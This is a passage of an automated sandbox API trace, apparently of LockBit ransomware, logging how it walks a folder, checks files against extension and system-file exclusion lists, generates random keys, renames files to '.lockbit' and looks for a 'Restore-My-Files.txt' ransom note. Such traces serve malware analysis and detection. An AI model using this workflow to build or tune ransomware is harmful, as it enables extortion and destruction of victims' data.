param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.680] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.680] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b120100, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3b120100, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x1a15, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21313_.GIF", cAlternateFileName="")) returned 1 [0209.680] lstrcmpiW (lpString1=".", lpString2="BD21313_.GIF") returned -1 [0209.681] lstrcmpiW (lpString1="..", lpString2="BD21313_.GIF") returned -1 [0209.681] PathFindExtensionW (pszPath="BD21313_.GIF") returned=".GIF" [0209.681] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.681] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.681] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21313_.GIF") returned 1 [0209.682] lstrcmpiW (lpString1="ntldr", lpString2="BD21313_.GIF") returned 1 [0209.682] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21313_.GIF") returned 1 [0209.682] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21313_.GIF") returned 1 [0209.682] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21313_.GIF") returned -1 [0209.682] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21313_.GIF") returned 1 [0209.682] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21313_.GIF") returned 1 [0209.682] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.682] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF") returned=".GIF" [0209.682] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.682] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.682] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.683] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.683] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.683] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.683] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.683] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.683] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF.lockbit") returned 76 [0209.683] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21313_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0209.684] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.684] malloc (_Size=0x40068) returned 0x1ff1e60 [0209.684] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6677) returned 1 [0209.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0209.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0209.685] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.688] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.688] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.689] free (_Block=0x1fa2ed8) [0209.689] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.689] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.689] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364d4d00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x364d4d00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21315_.GIF", cAlternateFileName="")) returned 1 [0209.689] lstrcmpiW (lpString1=".", lpString2="BD21315_.GIF") returned -1 [0209.689] lstrcmpiW (lpString1="..", lpString2="BD21315_.GIF") returned -1 [0209.689] PathFindExtensionW (pszPath="BD21315_.GIF") returned=".GIF" [0209.689] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.689] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.689] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.689] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.689] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.689] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.689] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.690] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.690] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.691] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21315_.GIF") returned 1 [0209.691] lstrcmpiW (lpString1="ntldr", lpString2="BD21315_.GIF") returned 1 [0209.691] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21315_.GIF") returned 1 [0209.691] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21315_.GIF") returned 1 [0209.691] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21315_.GIF") returned -1 [0209.691] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21315_.GIF") returned 1 [0209.691] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21315_.GIF") returned 1 [0209.691] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.691] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF") returned=".GIF" [0209.691] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.691] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.691] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.691] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.691] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.691] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.691] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.692] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.692] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.692] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF.lockbit") returned 76 [0209.692] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21315_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0209.693] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.693] malloc (_Size=0x40068) returned 0x3d70450 [0209.693] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=328) returned 1 [0209.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0209.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0209.694] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0209.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.695] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.695] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.696] free (_Block=0x1fa2ed8) [0209.696] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.696] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.696] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb568300, ftCreationTime.dwHighDateTime=0x1bd4f57, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbb568300, ftLastWriteTime.dwHighDateTime=0x1bd4f57, nFileSizeHigh=0x0, nFileSizeLow=0x11e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21318_.GIF", cAlternateFileName="")) returned 1 [0209.696] lstrcmpiW (lpString1=".", lpString2="BD21318_.GIF") returned -1 [0209.696] lstrcmpiW (lpString1="..", lpString2="BD21318_.GIF") returned -1 [0209.696] PathFindExtensionW (pszPath="BD21318_.GIF") returned=".GIF" [0209.696] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.696] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.696] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.696] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.696] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.696] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.696] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.696] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.696] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.697] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.697] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.698] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21318_.GIF") returned 1 [0209.698] lstrcmpiW (lpString1="ntldr", lpString2="BD21318_.GIF") returned 1 [0209.698] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21318_.GIF") returned 1 [0209.698] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21318_.GIF") returned 1 [0209.698] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21318_.GIF") returned -1 [0209.698] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21318_.GIF") returned 1 [0209.698] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21318_.GIF") returned 1 [0209.698] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.698] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF") returned=".GIF" [0209.698] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.698] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.698] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.698] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.698] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.699] lstrcmpiW (lpString1=".db3", 